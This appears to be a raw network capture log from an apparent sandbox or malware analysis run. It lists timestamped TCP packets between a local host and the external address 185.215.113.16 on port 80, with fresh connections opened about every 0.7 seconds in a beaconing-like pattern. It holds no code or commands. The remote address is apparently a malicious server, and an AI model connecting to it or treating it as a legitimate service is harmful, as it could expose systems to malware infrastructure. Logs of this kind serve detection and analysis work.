Sep 27, 2024 00:21:33.660505056 CEST	80	49820	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:33.660583019 CEST	49820	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:33.774291992 CEST	49820	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:33.774595976 CEST	49821	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:33.781166077 CEST	80	49820	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:33.781219959 CEST	49820	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:33.781441927 CEST	80	49821	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:33.781574965 CEST	49821	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:33.781671047 CEST	49821	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:33.788408041 CEST	80	49821	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:34.490014076 CEST	80	49821	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:34.490192890 CEST	49821	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:34.493433952 CEST	49821	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:34.493716955 CEST	49822	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:34.499974966 CEST	80	49821	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:34.499989033 CEST	80	49822	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:34.500026941 CEST	49821	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:34.500073910 CEST	49822	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:34.500309944 CEST	49822	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:34.506838083 CEST	80	49822	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:35.212430000 CEST	80	49822	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:35.212485075 CEST	49822	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:35.424082994 CEST	49822	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:35.424597025 CEST	49823	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:35.648744106 CEST	80	49823	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:35.649202108 CEST	80	49822	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:35.649303913 CEST	49822	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:35.649312973 CEST	49823	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:35.656918049 CEST	49823	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:35.663120985 CEST	80	49823	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:36.362907887 CEST	80	49823	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:36.363075018 CEST	49823	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:36.370589018 CEST	49823	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:36.370934963 CEST	49824	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:36.377353907 CEST	80	49823	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:36.377367973 CEST	80	49824	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:36.377417088 CEST	49823	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:36.377450943 CEST	49824	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:36.377777100 CEST	49824	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:36.384125948 CEST	80	49824	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:37.110224009 CEST	80	49824	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:37.110815048 CEST	49824	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:37.227325916 CEST	49824	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:37.227623940 CEST	49825	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:37.233784914 CEST	80	49825	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:37.233881950 CEST	49825	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:37.234039068 CEST	80	49824	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:37.234090090 CEST	49824	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:37.234158993 CEST	49825	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:37.240401030 CEST	80	49825	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:37.952260017 CEST	80	49825	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:37.952475071 CEST	49825	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:37.962367058 CEST	49825	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:37.962649107 CEST	49826	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:37.972537994 CEST	80	49826	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:37.972560883 CEST	80	49825	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:37.972654104 CEST	49825	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:37.972654104 CEST	49826	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:37.978038073 CEST	49826	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:37.985297918 CEST	80	49826	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:38.694607019 CEST	80	49826	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:38.694674015 CEST	49826	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:38.810939074 CEST	49826	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:38.811295033 CEST	49827	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:38.818038940 CEST	80	49826	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:38.818291903 CEST	80	49827	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:38.818367958 CEST	49826	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:38.818406105 CEST	49827	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:38.818686008 CEST	49827	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:38.825737000 CEST	80	49827	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:39.257014990 CEST	49827	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:39.260766983 CEST	49828	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:39.268186092 CEST	80	49828	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:39.270855904 CEST	49828	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:39.270950079 CEST	49828	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:39.277903080 CEST	80	49828	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:40.157294035 CEST	80	49828	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:40.160715103 CEST	49828	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:40.274590969 CEST	49828	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:40.274971962 CEST	49829	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:40.281346083 CEST	80	49828	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:40.281405926 CEST	49828	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:40.281459093 CEST	80	49829	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:40.281709909 CEST	49829	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:40.282069921 CEST	49829	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:40.288130045 CEST	80	49829	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:40.977560997 CEST	80	49829	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:40.977643967 CEST	49829	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:40.980387926 CEST	49829	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:40.980777025 CEST	49830	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:40.987082958 CEST	80	49829	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:40.987169981 CEST	49829	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:40.987338066 CEST	80	49830	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:40.987684965 CEST	49830	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:40.987936020 CEST	49830	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:40.994561911 CEST	80	49830	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:41.694217920 CEST	80	49830	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:41.694277048 CEST	49830	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:41.805509090 CEST	49830	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:41.805846930 CEST	49831	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:41.812151909 CEST	80	49831	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:41.812211990 CEST	49831	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:41.812320948 CEST	80	49830	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:41.812446117 CEST	49831	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:41.812474966 CEST	49830	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:41.818865061 CEST	80	49831	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:42.585949898 CEST	80	49831	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:42.586052895 CEST	49831	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:42.596577883 CEST	49831	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:42.596910954 CEST	49832	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:42.602051973 CEST	80	49832	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:42.602088928 CEST	80	49831	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:42.602118015 CEST	49832	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:42.602148056 CEST	49831	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:42.602546930 CEST	49832	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:42.607585907 CEST	80	49832	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:43.300069094 CEST	80	49832	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:43.302762985 CEST	49832	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:43.415004015 CEST	49832	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:43.415323973 CEST	49833	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:43.420459032 CEST	80	49832	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:43.420474052 CEST	80	49833	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:43.420531988 CEST	49832	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:43.420573950 CEST	49833	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:43.420763969 CEST	49833	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:43.426101923 CEST	80	49833	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:44.139190912 CEST	80	49833	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:44.139276028 CEST	49833	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:44.142725945 CEST	49833	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:44.143040895 CEST	49834	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:44.147898912 CEST	80	49833	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:44.147922993 CEST	80	49834	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:44.148025036 CEST	49833	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:44.148025036 CEST	49834	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:44.148298979 CEST	49834	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:44.153476000 CEST	80	49834	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:45.170546055 CEST	80	49834	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:45.170818090 CEST	49834	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:45.275336981 CEST	49834	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:45.275608063 CEST	49835	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:45.280450106 CEST	80	49834	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:45.280472040 CEST	80	49835	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:45.280616999 CEST	49835	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:45.280622005 CEST	49834	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:45.280916929 CEST	49835	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:45.285705090 CEST	80	49835	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:46.017177105 CEST	80	49835	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:46.017255068 CEST	49835	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:46.022655964 CEST	49835	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:46.023961067 CEST	49836	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:46.028055906 CEST	80	49835	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:46.028680086 CEST	49835	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:46.029133081 CEST	80	49836	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:46.029239893 CEST	49836	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:46.029953957 CEST	49836	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:46.034785032 CEST	80	49836	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:46.752209902 CEST	80	49836	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:46.752321959 CEST	49836	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:46.873562098 CEST	49836	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:46.873938084 CEST	49837	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:46.879647970 CEST	80	49836	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:46.879722118 CEST	49836	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:46.879877090 CEST	80	49837	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:46.880011082 CEST	49837	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:46.881067991 CEST	49837	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:46.887168884 CEST	80	49837	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:47.617619038 CEST	80	49837	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:47.617671013 CEST	49837	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:47.621028900 CEST	49837	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:47.621459961 CEST	49838	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:47.627777100 CEST	80	49837	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:47.627824068 CEST	49837	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:47.628329039 CEST	80	49838	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:47.628387928 CEST	49838	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:47.628515959 CEST	49838	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:47.634695053 CEST	80	49838	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:48.328773022 CEST	80	49838	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:48.330734015 CEST	49838	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:48.446573019 CEST	49838	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:48.446923971 CEST	49839	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:48.453855038 CEST	80	49839	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:48.453917027 CEST	49839	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:48.454063892 CEST	49839	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:48.454117060 CEST	80	49838	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:48.454350948 CEST	49838	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:48.460630894 CEST	80	49839	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:50.059190989 CEST	80	49839	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:50.059281111 CEST	49839	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:50.060899019 CEST	80	49839	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:50.061269999 CEST	49839	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:50.061918974 CEST	80	49839	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:50.061980009 CEST	49839	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:50.062467098 CEST	49839	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:50.062808037 CEST	80	49839	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:50.062877893 CEST	49839	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:50.062933922 CEST	49840	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:50.070194006 CEST	80	49840	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:50.070413113 CEST	49840	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:50.070661068 CEST	49840	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:50.076940060 CEST	80	49840	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:50.085366011 CEST	80	49839	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:50.085558891 CEST	49839	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:50.841761112 CEST	80	49840	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:50.841823101 CEST	49840	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:50.949400902 CEST	49840	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:50.950855017 CEST	49841	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:50.956893921 CEST	80	49840	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:50.956959963 CEST	49840	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:50.957117081 CEST	80	49841	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:50.957257032 CEST	49841	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:50.958353996 CEST	49841	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:50.965984106 CEST	80	49841	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:51.682055950 CEST	80	49841	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:51.682118893 CEST	49841	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:51.685625076 CEST	49841	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:51.685991049 CEST	49842	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:51.690854073 CEST	80	49842	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:51.691039085 CEST	49842	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:51.691263914 CEST	49842	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:51.691317081 CEST	80	49841	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:51.691359997 CEST	49841	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:51.693272114 CEST	49842	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:51.696029902 CEST	80	49842	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:51.696208000 CEST	49842	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:51.805809975 CEST	49843	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:51.810904980 CEST	80	49843	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:51.810972929 CEST	49843	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:51.811285973 CEST	49843	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:51.816171885 CEST	80	49843	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:52.598628044 CEST	80	49843	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:52.598789930 CEST	49843	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:52.602344036 CEST	49843	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:52.602713108 CEST	49844	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:52.607376099 CEST	80	49843	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:52.607448101 CEST	49843	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:52.607506990 CEST	80	49844	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:52.607835054 CEST	49844	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:52.608445883 CEST	49844	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:52.613202095 CEST	80	49844	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:53.322808981 CEST	80	49844	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:53.324744940 CEST	49844	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:53.430387020 CEST	49844	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:53.431200027 CEST	49845	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:53.435878038 CEST	80	49844	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:53.436048031 CEST	80	49845	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:53.436054945 CEST	49844	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:53.436116934 CEST	49845	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:53.436492920 CEST	49845	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:53.441337109 CEST	80	49845	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:54.126987934 CEST	80	49845	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:54.127055883 CEST	49845	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:54.130310059 CEST	49845	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:54.131314993 CEST	49846	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:54.137021065 CEST	80	49845	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:54.137072086 CEST	49845	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:54.137763977 CEST	80	49846	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:54.138719082 CEST	49846	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:54.139056921 CEST	49846	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:54.145673990 CEST	80	49846	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:54.861850977 CEST	80	49846	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:54.861948967 CEST	49846	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:54.977914095 CEST	49846	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:54.978235960 CEST	49847	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:54.985075951 CEST	80	49846	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:54.985127926 CEST	49846	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:54.985145092 CEST	80	49847	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:54.985236883 CEST	49847	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:54.985668898 CEST	49847	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:54.991966009 CEST	80	49847	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:55.694710970 CEST	80	49847	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:55.694830894 CEST	49847	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:55.698721886 CEST	49847	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:55.699181080 CEST	49848	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:55.703879118 CEST	80	49847	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:55.703964949 CEST	80	49848	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:55.704001904 CEST	49847	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:55.704054117 CEST	49848	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:55.704226017 CEST	49848	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:55.709053993 CEST	80	49848	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:56.622097969 CEST	80	49848	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:56.622158051 CEST	49848	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:56.622486115 CEST	80	49848	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:56.622533083 CEST	49848	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:56.728451014 CEST	49848	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:56.728787899 CEST	49849	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:56.735682011 CEST	80	49849	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:56.735766888 CEST	49849	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:56.735986948 CEST	80	49848	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:56.736056089 CEST	49848	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:56.736440897 CEST	49849	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:56.743478060 CEST	80	49849	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:57.445558071 CEST	80	49849	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:57.445645094 CEST	49849	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:57.449516058 CEST	49849	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:57.449971914 CEST	49850	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:57.454582930 CEST	80	49849	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:57.454646111 CEST	49849	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:57.454791069 CEST	80	49850	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:57.454979897 CEST	49850	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:57.455348969 CEST	49850	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:57.460269928 CEST	80	49850	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:58.159631968 CEST	80	49850	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:58.159765959 CEST	49850	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:58.274522066 CEST	49850	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:58.274878025 CEST	49851	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:58.281600952 CEST	80	49850	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:58.281610966 CEST	80	49851	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:58.281683922 CEST	49850	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:58.281713009 CEST	49851	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:58.281975031 CEST	49851	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:58.288536072 CEST	80	49851	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:58.988626003 CEST	80	49851	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:58.988698006 CEST	49851	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:58.991678953 CEST	49851	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:58.992034912 CEST	49852	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:58.996809006 CEST	80	49851	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:58.996866941 CEST	49851	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:58.996891022 CEST	80	49852	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:58.997201920 CEST	49852	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:58.997355938 CEST	49852	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:59.002860069 CEST	80	49852	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:59.733243942 CEST	80	49852	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:59.733334064 CEST	49852	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:59.852296114 CEST	49852	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:59.852600098 CEST	49853	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:59.860805035 CEST	80	49853	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:59.860815048 CEST	80	49852	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:59.860899925 CEST	49852	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:59.860914946 CEST	49853	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:59.861289978 CEST	49853	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:59.868891954 CEST	80	49853	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:00.568489075 CEST	80	49853	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:00.568595886 CEST	49853	80	192.168.2.4	185.215.113.16
